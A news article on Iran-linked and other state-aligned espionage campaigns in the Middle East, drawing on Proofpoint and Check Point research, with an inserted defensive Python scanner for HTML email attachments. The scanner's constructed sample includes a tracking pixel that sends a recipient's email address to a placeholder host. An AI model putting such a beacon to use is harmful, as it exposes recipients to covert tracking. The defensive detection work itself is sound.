Iran-linked cyber espionage surges across Middle East as conflict tensions rise, researchers say


New research from Proofpoint shows that escalating tensions involving Iran have coincided with a surge in cyber espionage activity targeting governments, diplomats, and organizations across the Middle East. Threat campaigns have increasingly used the conflict itself as lure material in phishing operations, often leveraging compromised government email accounts to distribute malicious messages and collect intelligence from regional political and diplomatic targets. Analysts say some actors appear to be opportunistically exploiting the geopolitical crisis for routine cyber operations, while others show signs of intensified intelligence-gathering efforts tied directly to the conflict.

Separate analysis by Check Point Software Technologies highlights a parallel trend in which actors linked to Iran’s Ministry of Intelligence and Security are increasingly interacting with the cybercrime ecosystem. Groups such as Void Manticore, also known as ‘Handala Hack,’ and MuddyWater have shown repeated overlaps with criminal infrastructure, tools, and services, suggesting a growing reliance on underground resources to support state objectives. Researchers say this convergence allows Iranian operators to expand their capabilities while also blurring the line between espionage and cybercrime, complicating attribution and masking state involvement behind criminal activity.

“As the war continues into its second week, several Iranian hacktivist groups and personas have claimed responsibility for various disruptive operations. Iranian espionage-focused threat groups remain somewhat active despite the Iranian government’s shutdown of the internet immediately following the initial US and Israeli attacks,” Proofpoint wrote in its Wednesday blog post. “For instance, on 8 March, Proofpoint observed the Iran-aligned threat actor TA453 (Charming Kitten, Mint Sandstorm, APT42) conduct a credential phishing attempt against a US think tank target. The email correspondence culminating in this credential phishing attempt commenced prior to the beginning of the conflict, indicating that TA453 is continuing to prioritize intelligence collection against its traditional target set.”

While it is unclear how wider Iranian cyber operations will continue, Proofpoint Threat Research has also observed an increase in campaigns from other state-sponsored threat actors targeting Middle East government organizations since the war began. These campaigns were conducted by both known groups and previously unobserved actors, with suspected attribution to China, Belarus, Pakistan, and Hamas. 

The post added that the campaigns heavily relied on aspects of the conflict as topical lure content to engage targets and often used compromised accounts belonging to government organizations to send phishing emails. Proofpoint assesses that this activity reflects a mixture of threat actors opportunistically using the war as lure content to conduct routine operations and those with an increased focus on intelligence collection targeting Middle Eastern government and diplomatic entities. 

Researchers at Proofpoint identified multiple cyber espionage campaigns tied to the regional conflict involving Iran, many of which used conflict-themed lures to target government and diplomatic organizations. One campaign attributed to the suspected China-aligned cluster UNK_InnerAmbush used phishing emails sent from a compromised account that linked to a Google Drive archive containing malicious files disguised as images. When opened, the files abused DLL sideloading to load a Cobalt Strike payload, which was then used for command-and-control activity. The phishing messages referenced geopolitical developments such as the reported death of Iran’s supreme leader and alleged plans for attacks on Gulf oil infrastructure.

Another operation by TA402, also known as Frankenstein or Cruel Jackal, targeted a Middle Eastern government entity using emails sent from both a compromised Iraqi Ministry of Foreign Affairs account and attacker-controlled Gmail addresses. The messages referenced potential U.S. military operations against Iran and a possible Gulf alliance responding to Iranian threats. Embedded links directed recipients either to a decoy document or to a spoofed Microsoft Outlook Web App login page designed to harvest credentials. 

In a separate campaign, the suspected Pakistan-aligned actor UNK_RobotDreams targeted India-based offices of Middle Eastern government organizations with spear-phishing emails impersonating India’s Ministry of External Affairs. The messages contained a PDF themed around a Gulf security alert tied to potential Iranian retaliation; clicking a fake Adobe Reader button triggered the download of an executable loader that used PowerShell to retrieve a Rust-based backdoor from attacker infrastructure hosted through Azure Front Door.

Proofpoint also observed activity from a cluster tracked as UNK_NightOwl that sent phishing emails to a Middle Eastern government ministry using both a compromised Syrian government account and an attacker-controlled address. The emails referenced the escalating conflict and directed recipients to a domain spoofing Microsoft OneDrive that hosted an Outlook Web App-style credential harvesting page before redirecting victims to a legitimate conflict monitoring site. 

Meanwhile, the Belarus-aligned actor TA473, also known as Winter Vivern, targeted government organizations in Europe and the Middle East with emails impersonating a spokesperson for the president of the European Council. These messages contained an HTML attachment posing as an EU statement about the Iran situation; opening the file displayed a decoy image while silently transmitting the recipient’s email address to attacker infrastructure.
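The TA473 attachment described above does nothing visible beyond showing a decoy image, yet a single remote resource load is enough to report who opened it. The following is an added illustration of how a mail gateway or analyst could triage such attachments; it is not code from the Proofpoint report. It parses an HTML body with the Python standard library, lists every tag that fetches from or submits to a remote host, and flags loads whose URL embeds an email address or an opaque token. The two sample attachments are constructed for the example, and the `.invalid` host is a placeholder.

```python
"""Triage HTML email attachments that pose as static statements but beacon out.

Added example (not from the Proofpoint report). Sample attachments below are
constructed; hosts use the reserved .invalid TLD.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qsl, unquote
import re

# Attributes that make the client fetch a resource on render, or on click/submit.
_REQUEST_ATTRS = {"src", "href", "action", "data", "poster"}
_EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def _looks_opaque(value):
    """Long base64/hex-like blob: typical of an encoded recipient identifier."""
    return (len(value) >= 24
            and re.fullmatch(r"[A-Za-z0-9+/_=-]+", value) is not None
            and any(ch.isdigit() for ch in value)
            and any(ch.isalpha() for ch in value))


class _Collector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.requests = []       # (tag, attribute, url)
        self.script_blocks = 0
        self.meta_refresh = []

    def handle_starttag(self, tag, attrs):
        attrs = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self.script_blocks += 1
        if tag == "meta" and attrs.get("http-equiv", "").lower() == "refresh":
            self.meta_refresh.append(attrs.get("content", ""))
        for name, value in attrs.items():
            if name in _REQUEST_ATTRS and value.strip():
                self.requests.append((tag, name, value.strip()))


def _is_remote(url):
    scheme = urlsplit(url).scheme.lower()
    return scheme in ("http", "https") or url.startswith("//")


def _carries_identity(url):
    """True if the URL's query or path embeds an email address or an opaque token."""
    decoded = unquote(url)
    if _EMAIL_RE.search(decoded):
        return True
    parts = urlsplit(decoded)
    query_values = [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    return any(_looks_opaque(v) for v in query_values + parts.path.split("/"))


def scan_html_attachment(html):
    """Return a findings dict for one HTML attachment body."""
    collector = _Collector()
    collector.feed(html)
    collector.close()
    remote = [(t, a, u) for t, a, u in collector.requests if _is_remote(u)]
    beacons = [(t, a, u) for t, a, u in remote if _carries_identity(u)]
    hosts = sorted({urlsplit(u).netloc.lower() for _, _, u in remote})
    return {
        "remote_loads": remote,
        "beacons": beacons,
        "remote_hosts": hosts,
        "script_blocks": collector.script_blocks,
        "meta_refresh": collector.meta_refresh,
        # A genuine static statement needs neither identity-bearing fetches nor
        # script-driven remote loads; either is worth a human look.
        "suspicious": bool(beacons) or (bool(remote) and collector.script_blocks > 0),
    }


# Constructed samples: a "statement" whose visible image is inline (cid:) while a
# 1x1 pixel reports the recipient's address to a remote host, and a benign copy.
BEACON_SAMPLE = """<html><body>
<img src="cid:statement.png" alt="Statement on the situation in Iran">
<img src="https://cdn.example-tracker.invalid/p.gif?u=diplomat%40mfa.example.gov" width="1" height="1">
</body></html>"""

BENIGN_SAMPLE = """<html><body>
<img src="cid:statement.png" alt="Statement on the situation in Iran">
</body></html>"""

if __name__ == "__main__":
    for name, body in (("beacon", BEACON_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, scan_html_attachment(body))
```

The scanner deliberately treats `href` on anchors as a request too, because a click-through link carrying the recipient's address is the same tracking primitive one step later. Percent-encoded identifiers are decoded before matching, since `%40` is the usual way an `@` survives a URL.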

The Proofpoint report also highlighted continued activity from the Iran-aligned group TA453, also known as Charming Kitten or APT42, which targeted a U.S. think tank by impersonating a policy researcher and inviting the victim to a roundtable discussion on Middle East air defense. After establishing trust through benign exchanges, the actor eventually sent a malicious link that redirected the target to a OneDrive-themed credential-phishing page hosted on Netlify.

Check Point’s analysis of recent activity it associates with MOIS-affiliated cyber actors suggests that the logic Iranian intelligence has long applied in the physical world, pursuing state objectives through deniable criminal intermediaries, is now being applied in the cyber domain. The firm described a shift beyond merely imitating cybercriminal behavior: these actors are increasingly engaging with the broader cybercriminal ecosystem itself, leveraging its infrastructure, access brokers, marketplaces, and affiliate-style relationships.

“For years, Iranian intelligence services have operated through deniable criminal intermediaries in the physical world. A similar pattern is now becoming visible in cyber space, where state objectives are increasingly pursued through criminal tools, services, and operational models,” the post detailed. “Notably, this dynamic appears with growing frequency in activity associated with actors linked to the Ministry of Intelligence and Security (MOIS). For a long time, Iranian actors sought to mask state activity behind the appearance of ordinary cyber crime, most often by posing as ransomware operators.”

Noting that the trend the researchers are seeing now goes beyond imitation, Check Point added that “Rather than simply adopting criminal and hacktivist personas to complicate attribution, some Iranian actors appear to be associating with the cyber criminal ecosystem itself, leveraging its malware, infrastructure, and affiliate-style mechanisms. This shift matters because it does more than improve deniability; it can also expand operational reach and enhance technical capability.”

Void Manticore, also known as Handala, is an Iranian-linked threat actor active in hack-and-leak and disruptive cyber operations tied to strategic objectives. The group has operated through personas such as Homeland Justice, used in attacks on Albania, and Handala in campaigns targeting Israel. 

While best known for wiper attacks and data leaks, the Handala operations also revealed the use of the commercially available infostealer Rhadamanthys, a widely used tool sold on darknet forums and employed by both cybercriminal and state-aligned actors. In several phishing campaigns against Israeli targets, the group paired Rhadamanthys with custom wipers, often disguising the lure as software updates.

Separately, the Iran-linked group MuddyWater, which U.S. authorities associate with Iran’s Ministry of Intelligence and Security, has long conducted espionage operations targeting government and private-sector organizations across sectors such as telecommunications, defense, and energy in the Middle East. Recent research shows overlaps between MuddyWater activity and criminal malware clusters, which have sometimes led to attribution confusion. 

One example is the Tsundere Botnet, also called DinDoor, discovered in 2025 and linked to MuddyWater through infrastructure and operational patterns. The botnet uses Node.js scripts to execute code on compromised systems and can switch to a Deno-based execution method when Node.js is detected. Another overlap involves the downloader FakeSet, used in infection chains delivering CastleLoader malware. However, researchers assess that shared code-signing certificates used across MuddyWater tools, Tsundere variants, and CastleLoader likely indicate a common certificate source rather than direct operational collaboration.
